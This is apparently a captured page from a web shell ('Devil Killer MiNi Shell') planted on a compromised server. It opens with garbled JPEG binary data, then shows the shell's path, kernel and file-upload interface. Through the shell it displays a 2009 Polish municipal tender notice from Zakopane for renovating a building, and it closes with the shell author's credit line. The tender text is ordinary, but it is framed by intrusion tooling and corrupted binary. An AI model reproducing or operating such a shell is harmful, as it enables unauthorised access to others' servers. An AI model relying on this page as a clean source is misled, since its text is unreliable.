JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090727/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090727/255360-N-2009.html

<p class="kh_header"><b>Zakopane: ZP/341/44/09 Zaprojektowanie i wykonanie  robót budowlanych -Remont i adaptacja pomieszczeń  budynku ul. Kościeliska  7 w Zakopanem na potrzeby Małopolskiego Systemu Informacji Turystycznej</b><br>
<b>Numer ogłoszenia: 255360 - 2009; data zamieszczenia: 27.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Zakopane , ul. T. Kościuszki 13, 34-500 Zakopane, woj. małopolskie, tel. 018 2020448, faks 018 2020448.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zakopane.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZP/341/44/09 Zaprojektowanie i wykonanie  robót budowlanych -Remont i adaptacja pomieszczeń  budynku ul. Kościeliska  7 w Zakopanem na potrzeby Małopolskiego Systemu Informacji Turystycznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  jest zaprojektowanie i wykonanie  robót budowlanych na zadaniu nr 05/09 Remont i adaptacja pomieszczeń  budynku ul. Kościeliska  7 w Zakopanem na potrzeby Małopolskiego Systemu Informacji Turystycznej. 

1	Zakres robót budowlanych związanych z remontem i adaptacja pomieszczeń na potrzeby Małopolskiego Systemu Informacji Turystycznej obejmuje 
w szczególności:

1.1.	roboty rozbiórkowe:

1.1.1	ręczną rozbiórkę elementów konstrukcji betonowych, niezbrojnych (posadzek i podkładów betonowych) o grubości ponad 15 cm na całej powierzchni parteru,
1.1.2	odbicie tynków wewnętrznych z zaprawy cementowo-wapiennej na ścianach, filarach i pilastrach, o pow. odbicia pow. 5 m2,
1.1.3	wykucie otworów w ścianach z cegły grub. ponad 1/2 cegły na zaprawie cementowej, dla otworów drzwiowych i wykonanie przesklepień

1.2.	roboty ogólnobudowlane:

1.2.1	wykonanie podkładów betonowych pod posadzki na podłożu gruntowym we wszystkich pomieszczeniach parteru,
1.2.2	 wykonanie we wszystkich pomieszczeniach parteru izolacji przeciwwilgociowej 
z folii, izolacji cieplnej z płyt styropianowych FS 20 poziomej, układanej na sucho, 
1.2.3	wykonanie podkładów betonowych pod posadzki, wyrównanych wylewka samopoziomująca, we wszystkich pomieszczeniach parteru,
1.2.4	wykonanie tynków wewnętrznych kat IV na ścianach parteru,
1.2.5	wykonanie posadzki z paneli podłogowych,
1.2.6	wykonanie posadzek z płytek,
1.2.7	licowanie ścian w sanitariacie płytkami, 
1.2.8	dwukrotne malowanie farbami emulsyjnymi tynków wewnętrznych ścian, bez gruntowania, 
1.2.9	wykonanie  sufitu podwieszanego kasetonowego we wszystkich pomieszczeniach parteru, 
1.2.10	montaż drzwi dwuskrzydłowych wewnętrznych z kształtowników aluminiowych 
z przekładka termiczną ,


1.3.	instalacje wod.- kan. i co:
1.3.1	wykonanie instalacji wodociągowej rurociąg - z polipropylenu o śr. zewn. 20 mm,
1.3.2	 wykonanie podejść odpływowych,
1.3.3	montaż armatury i osprzętu 
1.3.4	demontaż grzejników żeliwnych typ ST,
1.3.5	demontaż rurociągu stalowego c.o. wykonanie rurociągu c.o. z tworzyw sztucznych o połączeniach zgrzewanych,
1.3.6	 montaż grzejników  stalowych, trzypłytowych 

1.4.	instalacje elektryczne:
1.4.1	wymiana instalacji elektrycznej wraz z osprzętem  i montażem gniazdek wtyczkowych i  opraw oświetleniowych,

1.5.	instalacja wentylacji: 
1.5.1	udrożnienie wentylacji 
1.5.2	montaż urządzeń wspomagających ciąg 
1.5.3	wykonanie niezbędnej   instalacji wentylacyjnej  pomieszczeń,

 

2	Zakres przedmiotu zamówienia :

2.1.	A - wykonanie dokumentacji projektowo - kosztorysowej
2.2.	B - wykonanie robót budowlanych związanych z remontem i adaptacja pomieszczeń na potrzeby Małopolskiego Systemu Informacji Turystycznej.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 71.25.00.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	 Wykonawca jest zobowiązany wnieść wadium przetargowe w wysokości 4.500,00  ( słownie: cztery tysiące pięćset  złotych)

2.	Wadium może być wnoszone w jednej lub w kilku  następujących formach: 
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
2) poręczeniach bankowych;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 lit. b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 z późn.zm.).

3.	Wadium przetargowe w  pieniądzu należy wnieść  przelewem na konto Urzędu Miasta Zakopane w PEKAO S.A. w Zakopanem nr: 85124047481111000048718666 Wadium powinno znajdować się na koncie zamawiającego najpóźniej w terminie składania ofert tj.18 sierpnia  2009r. do godz.  12°°
Wadium wnoszone w pozostałych formach należy złożyć w postaci oryginału, najpóźniej w terminie składania ofert tj. 18 sierpnia  2009r.do godz. 12°° w  Biurze  ds. zamówień publicznych pok. nr 7 /parter/.
        
  UWAGA! Nie wolno oryginałów tych dokumentów wkładać do oferty.

4.	ZWROT WADIUM : 
1) Zamawiający zwraca niezwłocznie wadium, jeżeli:
a) upłynął termin związania ofertą;
b) zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania umowy.
 c) zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
      2)  Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy: 
a) który wycofał ofertę przed upływem terminu składania ofert;
b) który został wykluczony z postępowania;
c) którego oferta została odrzucona.
3)   Zamawiający żąda  ponownego wniesienia wadium przez wykonawców, którym zwrócono wadium na podstawie ppkt 2 lit. b i c  jeżeli w wyniku  ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia wykonawcy lub odrzucenia oferty. Wykonawcy wnoszą wadium w terminie określonym przez zamawiającego 
4) Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku banko?wego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.

      Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na  
      wezwanie, o którym mowa w art. 26 ust. 3ustawy  nie złożył dokumentów lub oświadczeń, o  
      których mowa w art. 25 ust. 1 ustawy,  lub pełnomocnictw, chyba że udowodni, że wynika to z 
      przyczyn nieleżących po jego stronie. 
5. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy.
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki zawarte w art.22 ust.1 ustawy Prawo zamówień publicznych tj.:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wy?konania zamówienia, lub przedstawią  pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia

3) znajdują się w sytuacji ekonomicznej i finansowej za?pewniającej wykonanie zamówienia;
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art.24 ust.1 i 2 ustawy Prawo zamówień publicznych
Opis sposobu dokonywania oceny spełnienia warunków:
 Doświadczenie: 
-Wykonawca musi wykazać, że w ciągu ostatnich 5 lat kalendarzowych ( licząc od daty wszczęcia postępowania) a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał  co najmniej 2 roboty o zakresie odpowiadającym swoim rodzajem i wartością robotom tj. remontowi, budowie, lub przebudowie budynku o wartości robót  nie mniejszej niż 100 000  PLN  każda, oraz wykonaniu dokumentacji technicznej remontu, przebudowy lub rozbudowy budynku o kubaturze większej niż 1000 m3 ,

Potencjał kadrowy
-Wykonawca musi zapewnić: 
-  opracowanie podstawowej dokumentacji projektowej   przez osoby, posiadające 
    uprawnienia budowlane w specjalności architektonicznej  bez ograniczeń lub  
    odpowiednich wydanych na podstawie wcześniejszych  przepisów, 
-  opracowanie branżowej  dokumentacji projektowej   przez osoby, posiadające uprawnienia 
     budowlane w specjalnościach: konstrukcyjno budowlanej, instalacji sanitarnych i instalacji  
     elektrycznych    bez ograniczeń lub odpowiednich wydanych na podstawie  
     wcześniejszych  przepisów, stosownie do potrzeb.
-  kierowanie zleconymi robotami przez osoby, posiadające uprawnienia budowlane w  
   specjalności konstrukcyjno - budowlanej bez ograniczeń lub odpowiednich 
   zapewniających możliwość kierowania i nadzorowania robotami budowlanymi obiektów  
    wydanych na podstawie wcześniejszych  przepisów, należące do właściwej   
     Izby Inżynierów Budownictwa,
- kierowanie zleconymi robotami branżowymi przez osoby, posiadające uprawnienia budowlane w specjalności instalacji sanitarnych i elektrycznych   
bez ograniczeń lub odpowiednich wydanych na podstawie wcześniejszych  przepisów, należące do właściwej Izby Inżynierów Budownictwa, 
- kierowanie zleconymi robotami przez osoby posiadające uprawnienia konstrukcyjno-budowlane bez ograniczeń lub odpowiadające wydane na podstawie wcześniejszych przepisów, uprawniające do kierowania robotami budowlanymi i  należące do  Izby  Inżynierów Budownictwa

Potencjał techniczny
-Wykonawca musi  w tym zakresie złożyć stosowne oświadczenia. 
 Potencjał finansowo- ekonomiczny 
-Wykonawca musi wykazać , że posiada środki finansowe lub zdolność kredytową 
w wysokości nie mniejszej niż  50 000,00 zł (słownie: pięćdziesiąt   tysięcy złotych)  
 
Ocena spełnienia powyższych warunków będzie dokonywana metodą spełnia lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.aktualny odpis z właściwego rejestru , albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru , lub zgłoszenie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

2). oświadczenie wykonawcy, że nie podlega wykluczeniu na podstawie art.24 ust.1 i 2 ustawy Pzp( załącznik nr 2 do  siwz) oraz oświadczenie wykonawcy, że spełnia warunki określone w art.22 ust.1 pkt.1-3  ustawy PZP (załącznik 2a do siwz) 

3) na potwierdzenie wymaganego doświadczenia wykonawca zobowiązany jest załączyć   do    oferty  wykaz ( należy wypełnić   załącznik nr 5    do    siwz)        wykonanych w   okresie ostatnich 5 lat przed dniem wszczęcia niniejszego            postępowania , a jeżeli okres  prowadzenia działalności  jest krótszy- w tym okresie) z               który będzie potwierdzał, że wykonawca  wykonał  co najmniej 2 roboty o zakresie odpowiadającym swoim rodzajem i wartością robotom tj. remontowi, budowie, lub przebudowie budynku o wartości robót  nie mniejszej niż 100 000  PLN  każda, oraz wykonaniu dokumentacji technicznej remontu, przebudowy lub rozbudowy budynku o kubaturze większej niż 1000 m3 ,

      Wykonawca zobowiązany jest do powyższego wykazu załączyć dokumenty (np; referencje) potwierdzające, że podane w wykazie   roboty    zostały wykonane należycie.

4.wypełniony druk oferty stanowiący załącznik nr 3 do  siwz(wykonawca może założyć ofertę na własnym formularzu, lecz jego  treść i układ muszą być zgodne z formularzem załączonym do siwz).

informacji na temat przeciętnej liczby zatrudnionych pracowników lub liczebności personelu kierowniczego, w okresie ostatnich trzech lat, a w przypadku gdy okres prowadzenia działalności jest krótszy z tego okresu - należy wypełnić załącznik nr 8.do  siwz

6. wykaz osób( należy wypełnić załącznik nr 9 do  siwz) , którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności lub  pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa , wykonawca wskazał osoby, którymi będzie dysponował.
 Z wykazu lub  pisemnego zobowiązania innego podmiotu musi wynikać , że wykonawca dysponuje lub będzie dysponował  osobami: 
 - dla opracowani podstawowej dokumentacji projektowej  - posiadającymi 
    uprawnienia budowlane w specjalności architektonicznej  bez ograniczeń lub  
    odpowiednich wydanych na podstawie wcześniejszych  przepisów, 
-  opracowanie branżowej  dokumentacji projektowej   przez osoby, posiadające uprawnienia  budowlane w specjalnościach: konstrukcyjno budowlanej, instalacji sanitarnych i instalacji   elektrycznych    bez ograniczeń lub odpowiednich wydanych na podstawie    wcześniejszych  przepisów, stosownie do potrzeb.
-  kierowanie zleconymi robotami przez osoby, posiadające uprawnienia budowlane w  specjalności konstrukcyjno - budowlanej bez ograniczeń lub odpowiednich 
   zapewniających możliwość kierowania i nadzorowania robotami budowlanymi obiektów    wydanych na podstawie wcześniejszych  przepisów, należące do właściwej     Izby Inżynierów Budownictwa,
- kierowanie zleconymi robotami branżowymi przez osoby, posiadające uprawnienia budowlane w specjalności instalacji sanitarnych i elektrycznych   
bez ograniczeń lub odpowiednich wydanych na podstawie wcześniejszych  przepisów, należące do właściwej Izby Inżynierów Budownictwa, 
- kierowanie zleconymi robotami przez osoby posiadające uprawnienia konstrukcyjno-budowlane bez ograniczeń lub odpowiadające wydane na podstawie wcześniejszych przepisów, uprawniające do kierowania robotami budowlanymi i  należące do  Izby  Inżynierów Budownictwa

Wykonawca zobowiązany jest do powyższego wykazu załączyć kserokopie uprawnień  oraz kserokopie  aktualnej przynależności do właściwej Izby Inżynierów Budownictwa  wykazanych w wykazie osób 


7. na  potwierdzenia  znajdowania się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, zamawiający wymaga  załączenia do oferty  informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków     finansowych lub zdolność kredytową wykonawcy w wysokości nie mniejszej niż 50. 000,00-   zł ( słownie: pięćdziesiąt   tysięcy   złotych ) wystawionej nie   wcześniej niż 3   miesiące przed upływem terminu składania ofert.

8. wstępny opis planowania robót zgodny z wymogami pfu oraz wstępny harmonogram robót i płatności( informacje do oferty  maja być przedkładane w formie opisów, schematów, tabel itp.)

  9.  ofertową Tabelę Elementów Rozliczeniowych Robot  z podaniem podstaw ich wycen,  ilości, ceny i zachowaniem kolejności technologicznej robót, tabela musi zawierać     elementy dotyczące wyceny części dotyczące wykonania  dokumentacji projektowej i  remontu

Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt XIII -1  specyfikacji, składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
- nie otwarto jego likwidacji ani nie ogłoszono upadłości;
Uwaga! Dokument, o którym  mowa  powyżej powinien  być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu o którym mowa  w pkt XIV a  zastępuje się go  dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sadowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju w którym wykonawca ma siedzibę lub miejsce zamieszkania.

UWAGA! 
Dokumenty mogą być przedstawione w formie kopii  (kserokopii)  poświadczonych za zgodność z oryginałem  przez wykonawcę.

Zamawiający zastrzega sobie prawo wglądu w oryginały dokumentów..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zakopane.eu  pod linkiem -Przetargi.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Rozwoju Lokalnego i Inwestycji
Urzad Miasta Zakopane
ul. Kościuszki 13
34-500 Zakopane.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.08.2009 godzina 12:00, miejsce: Biuro ds zamówien publicznych - pok.7 
Urzad Miasta Zakopane
ul. Kościuszki 13
34-500 Zakopane.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Informacja na temat zmian postanowień zawartej umowy:
1.W przypadku zwłoki, z przyczyn  nie leżących po stronie Wykonawcy, spowodowanej przedłużaniem się  procedur administracyjnych, Zamawiający dopuszcza przedłużenie terminu wykonania umowy w formie aneksu z zachowaniem przepisów ustawy o finansach publicznych
2.Wykonawca może dokonywać zmiany kluczowych specjalistów, przedstawionych 
w ofercie, jedynie za uprzednią pisemną zgodą zamawiającego, akceptującego nowego kluczowego specjalistę. 
3.Wykonawca z własnej inicjatywy proponuje zmianę kluczowych specjalistów 
w następujących przypadkach:
-śmierci, choroby lub innych zdarzeń losowych kluczowego specjalisty,
-niewywiązywania się kluczowego specjalisty z obowiązków wynikających 
z umowy,
-jeżeli zmiana kluczowego specjalisty stanie się konieczna z jakichkolwiek innych przyczyn niezależnych od wykonawcy (np. rezygnacji itp.).
4.Zamawiający może zażądać od wykonawcy zmiany kluczowego specjalisty, jeżeli uzna, że nie wykonuje on swoich obowiązków wynikających z umowy.
5.W przypadku zmiany kluczowego specjalisty, nowy kluczowy specjalista musi spełniać wymagania określone dla danego specjalisty.
6.Wykonawca obowiązany jest zmienić kluczowego specjalistę zgodnie 
z żądaniem zamawiającego w terminie wskazanym we wniosku zamawiającego.
7.Wykonawca może przedłużyć termin wykonania przedmiotu umowy o czas opóźnienia zamawiającego, jeżeli takie opóźnienie jest lub będzie miało wpływ 
na wykonanie przedmiotu umowy, w wykonaniu następujących zobowiązań:
-przekazania terenu budowy,
-zmiany terminu dokonania odbiorów przewidzianych w umowie,
-jakiegokolwiek opóźnienia, utrudnienia lub przeszkód spowodowanych przez 
lub dających się przypisać zamawiającemu, lub innemu wykonawcy, zatrudnionemu przez zamawiającego na trenie budowy.
8.Wykonawca może przedłużyć termin wykonania przedmiotu umowy o czas opóźnienia, jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy, w przypadku:
-zawieszenia robót przez zamawiającego,
-zmian dokumentacji projektowej, dokonanych na wniosek zamawiającego 
(lub wykonawcy),

Creat By MiNi SheLL
Email: jattceo@gmail.com